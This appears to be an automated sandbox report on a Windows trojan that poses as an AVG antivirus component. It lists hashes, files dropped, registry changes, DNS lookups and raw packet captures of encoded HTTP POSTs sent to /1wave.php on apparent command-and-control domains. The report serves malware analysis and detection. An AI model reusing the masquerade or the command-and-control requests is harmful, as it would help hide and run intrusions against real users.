Analysis Date2014-01-12 23:42:31
MD5d2700f92b96f9b54610e945e1a108f97
SHA142a5dc5fadfb833a3cdb0ce624267e533d07122b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: a7c2c0b0bf4257f59129a3499dc41fd4 sha1: 7cc6945796465cbaf8db170f05f9fcde2aca0fb4 size: 12288
Section.rdata md5: 25d2cf3a0676927528da8e1bebe0b9ab sha1: ef9577fc362a546d809564254957175ff668679c size: 2560
Section.data md5: 488b9d94444a557b64e5fc433c60788c sha1: 19e1e6e84762c8662dddae32b71c2ce46c60afcd size: 102912
Section.rsrc md5: 97c035d08782b925f88d8d9752cee0de sha1: bcafb971856a7801c1aa0543d6324e94c9f6d102 size: 4608
Timestamp2009-09-10 05:56:31
VersionLegalCopyright: Copyright © 2010 q3 AVG Technologies CZ, s.r.o.s
InternalName: SWav_g_amrpv
FileVersion: 9.0.0.832
CompanyName: AVG Technologies CZ, s.r.o.
PrivateBuild: Win32 Release_Unicode
ProductName: AVG Internet Security 4i
SpecialBuild: Avg8VC84i_2010_0603_213001(832), SVNRev 132525ER (/branches/release/avg90_sp3)
ProductVersion: 9.0.0.832
FileDescription: A AVG Alert Manager
OriginalFilename: SWav_g_amrpv
PEhash1591af960c93ea1d8dfe4efcd6d34f31f858ad23
AVavgWin32/Cryptor
AVmcafeeDownloader-CEW.ai

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\Ojawia.exe
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\Tasks\{62C40AA6-4406-467a-A5A5-DFDF1B559B7A}.job
Creates ProcessC:\WINDOWS\Ojawia.exe
Creates MutexGlobal\{C814BC71-BD20-47f7-8107-9BCB142C6F1C}

Process
↳ C:\WINDOWS\Ojawia.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\2SPI9KEA4C\OhuD ➝
5
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\Tasks\{62C40AA6-4406-467a-A5A5-DFDF1B559B7A}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\WINDOWS\Tasks\{62C40AA6-4406-467a-A5A5-DFDF1B559B7A}.job
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{C814BC71-BD20-47f7-8107-9BCB142C6F1C}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNSameba.jp
Type: A
180.233.142.60
DNSwretch.cc
Type: A
68.180.206.184
DNSwretch.cc
Type: A
98.139.102.145
DNSwretch.cc
Type: A
106.10.165.51
DNSwretch.cc
Type: A
77.238.178.122
DNSwretch.cc
Type: A
87.248.120.148
DNSbaqwi.com
Type: A
69.43.161.169
DNSbuyitave.com
Type: A
208.73.211.247
DNStopjer.com
Type: A
HTTP POSThttp://baqwi.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POSThttp://buyitave.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 69.43.161.169:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.247:80

Raw Pcap
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206261   ncoded..Host: ba
0x00000060 (00096)   7177692e 636f6d0d 0a557365 722d4167   qwi.com..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000090 (00144)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x000000a0 (00160)   4e542035 2e30290d 0a436f6e 74656e74   NT 5.0)..Content
0x000000b0 (00176)   2d4c656e 6774683a 20333035 0d0a436f   -Length: 305..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000d0 (00208)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000e0 (00224)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x000000f0 (00240)   3d652f65 3672354a 5a523130 4669776f   =e/e6r5JZR10Fiwo
0x00000100 (00256)   474c6735 31516743 39686e62 45786f32   GLg51QgC9hnbExo2
0x00000110 (00272)   31617433 614f5967 73552f48 4c6b7a66   1at3aOYgsU/HLkzf
0x00000120 (00288)   33637577 70447452 7379352b 65305a5a   3cuwpDtRsy5+e0ZZ
0x00000130 (00304)   5237336c 4558787a 38543235 61367833   R73lEXxz8T25a6x3
0x00000140 (00320)   30656463 7364774d 4a4f6441 462f566a   0edcsdwMJOdAF/Vj
0x00000150 (00336)   56735748 46304579 377a444a 57392f73   VsWHF0Ey7zDJW9/s
0x00000160 (00352)   394a4572 4a307066 72383251 59366238   9JErJ0pfr82QY6b8
0x00000170 (00368)   48436753 754e6155 71696734 6f563342   HCgSuNaUqig4oV3B
0x00000180 (00384)   42774b32 74327a37 33524765 7955446a   BwK2t2z73RGeyUDj
0x00000190 (00400)   67737548 4670434c 4f696b52 50534c39   gsuHFpCLOikRPSL9
0x000001a0 (00416)   536a7550 31494238 624b706a 746d4a30   SjuP1IB8bKpjtmJ0
0x000001b0 (00432)   69673356 6d566346 38616f4f 72425252   ig3VmVcF8aoOrBRR
0x000001c0 (00448)   43796462 4b50674f 69452f6b 7a6a674d   CydbKPgOiE/kzjgM
0x000001d0 (00464)   76414543 6d564362 664b724e 6536576c   vAECmVCbfKrNe6Wl
0x000001e0 (00480)   4867686b 45546a2f 6b477638 46363055   HghkETj/kGv8F60U
0x000001f0 (00496)   52444d50 686e3470 64494144 71467842   RDMPhn4pdIADqFxB
0x00000200 (00512)   482f3476 4f384572 68676c32 55597753   H/4vO8Erhgl2UYwS
0x00000210 (00528)   6c657234 4d437830 79415a34 44         ler4MCx0yAZ4D

0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206275   ncoded..Host: bu
0x00000060 (00096)   79697461 76652e63 6f6d0d0a 55736572   yitave.com..User
0x00000070 (00112)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000080 (00128)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000090 (00144)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000a0 (00160)   7773204e 5420352e 30290d0a 436f6e74   ws NT 5.0)..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3330350d   ent-Length: 305.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x000000d0 (00208)   73650d0a 43616368 652d436f 6e74726f   se..Cache-Contro
0x000000e0 (00224)   6c3a206e 6f2d6361 6368650d 0a0d0a64   l: no-cache....d
0x000000f0 (00240)   6174613d 652f6536 72354a5a 52313046   ata=e/e6r5JZR10F
0x00000100 (00256)   69776f47 4c673531 51674339 686e6245   iwoGLg51QgC9hnbE
0x00000110 (00272)   786f3231 61743361 4f596773 552f484c   xo21at3aOYgsU/HL
0x00000120 (00288)   6b7a6633 63757770 44745273 79352b65   kzf3cuwpDtRsy5+e
0x00000130 (00304)   305a5a52 37336c45 58787a38 54323561   0ZZR73lEXxz8T25a
0x00000140 (00320)   36783330 65646373 64774d4a 4f644146   6x30edcsdwMJOdAF
0x00000150 (00336)   2f566a56 73574846 30457937 7a444a57   /VjVsWHF0Ey7zDJW
0x00000160 (00352)   392f7339 4a45724a 30706672 38325159   9/s9JErJ0pfr82QY
0x00000170 (00368)   36623848 43675375 4e615571 6967346f   6b8HCgSuNaUqig4o
0x00000180 (00384)   56334242 774b3274 327a3733 52476579   V3BBwK2t2z73RGey
0x00000190 (00400)   55446a67 73754846 70434c4f 696b5250   UDjgsuHFpCLOikRP
0x000001a0 (00416)   534c3953 6a755031 49423862 4b706a74   SL9SjuP1IB8bKpjt
0x000001b0 (00432)   6d4a3069 6733566d 56634638 616f4f72   mJ0ig3VmVcF8aoOr
0x000001c0 (00448)   42525243 7964624b 50674f69 452f6b7a   BRRCydbKPgOiE/kz
0x000001d0 (00464)   6a674d76 4145436d 56436266 4b724e65   jgMvAECmVCbfKrNe
0x000001e0 (00480)   36576c48 67686b45 546a2f6b 47763846   6WlHghkETj/kGv8F
0x000001f0 (00496)   36305552 444d5068 6e347064 49414471   60URDMPhn4pdIADq
0x00000200 (00512)   46784248 2f34764f 38457268 676c3255   FxBH/4vO8Erhgl2U
0x00000210 (00528)   5977536c 6572344d 43783079 415a3444   YwSler4MCx0yAZ4D
0x00000220 (00544)                                         


Strings
040504b0
 2010 q3 AVG Technologies CZ, s.r.o.s
9.0.0.832
A AVG Alert Manager
Avg8VC84i_2010_0603_213001(832), SVNRev 132525ER (/branches/release/avg90_sp3)
AVG Internet Security 4i
AVG Technologies CZ, s.r.o.
BBABORT
biS2
Cannot open file "%s". %s
CompanyName
Copyright 
DVCLAL
Error reading %s%s%s: %s
Failed to get data for '%s'
FileDescription
FileVersion
InternalName
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
LegalCopyright
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MS Sans Serif
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
PrivateBuild
ProductName
ProductVersion
Property is read-only
Property %s does not exist
PvhN
Resource %s not found
SpecialBuild
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
SWav_g_amrpv
TEXTFILEDLG
Translation
VarFileInfo
VS_VERSION_INFO
Win32 Release_Unicode
XcxS
),0Eb[
0eeEFD5eM7wt
0M0-%M
|0Mp@X.|
0u44@R
1s7>9:$#
1s7{p7
1yC}XQ
{2PsKk
2q64>b
}2tDo[
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
3a:aPe
	3KjeN
3:(oYp
4oMQ}Z
577gCY2
5C5j53F
5mcV6(
5Q3u	>p
6&#3ub 
_6KcDP
\75Z_V
[_^7RIpK
'9~`7A
9Biav8
9vP	dTd
aGSAQqaZ9
ap6J2ye3TO
B7E[KN
BEIPQDB
bImgIh
bqe8I1
c?+f!B
(c-$HmF
CopyEnhMetaFileA
`]cQm_
@.data
DNM-7}
DrawMenuBar
e[m{1}
EnableWindow
EqualRect
ExitProcess
e*XW	^B
=[-|F{7
[FdU	[#I
FHah_:Z
FillRect
FindWindowA
Fq3318
Fx)q77VSW
GDI32.dll
GetCommandLineW
GetCurrentProcess
GetCurrentThread
GetCursor
GetDCOrgEx
GetMenuItemCount
GetModuleHandleW
GetTextColor
GetTopWindow
GetV9r
GetWindow
g+ln<N
_g&R^e
GskV8wuE3
GuJ1^O
h`hElc
h;hW{m
H&^Mv+~y
^ HSjA
I3&z1*0
i5OfNd
I=8fgA=
^ia6}"
?iBy7e
IsBadReadPtr
IvI~SO
i%[>v%V
IXBadC
j0?|	]
:J]0Sj
j&&4	[j
'jA5z'
{ jD2bs%O
-;j$iW
Jo2^Fo2
jOhH'`3
JpI20yUV
'`jWgi
j,{z":
kernel32.dll
K=*;_r
Kz}j:}l
#l$I(j
(Ll_;0ti
LoadBitmapA
LoadCursorA
L/%	Xy
M4-Af';
M6]M0,MU
miNZ7V
^MkA|{
{'M^Q@N
|mVE]Yc
mW}UJ#_
^	)~'N
N0cdqw
n2d[$G
N!(H:Z9]
NU][m6
=nywLH
o~)130wR
O2p+4l
OLEAUTn
out_Qf
p7;7w~Y
pi0rHpd
pm*:3W~ 	
Pr7cAd<
puT1a\]`
QAE<XZ
qaH1	H
qf{]mC
q^mF,N
`.rdata
`.rdatI
.=Rj'0
Rv=MbP
}RWN^O
(+-</S
s(3=$a@
s +5\a@
_[s6kvt
shell32.dll
Shell_NotifyIconW
SHFileOperationA
SHGetDiskFreeSpaceA
SHGetSpecialFolderLocation
Sj	*LV
SWav_g_amrpv
t77-n[a
tC}8L-
.tc -Y
Tfr4MB
!This program cannot be run in DOS mode.
T!PKx^d
u|	!&	
u2iMo2
{UhgN8] 
UNIQSTR
user32.dll
v23zSNj
V4<*M$Ti
VCUHWyIc
Vi9hUfQ
VirtualAlloc
V??QHnc
vZ8]u_$+
Vz"KuGfIL
)w4X=w)
WJ+[;(
W&!OZ;
W\\<p\1
~W;QB^Q`
WQ=G?	
:;WR~^
WS!	KtF
W#VZP$~
XNPc,XNxc@XN
	.x NtEM
XOk7@zq
[yClaW
Y*$E,M
,YvuI9
Z0EMVd
Zd/.eWU
ZtBaQw[$A
ZtlD?v
Zt{p@?[
z	Y#5V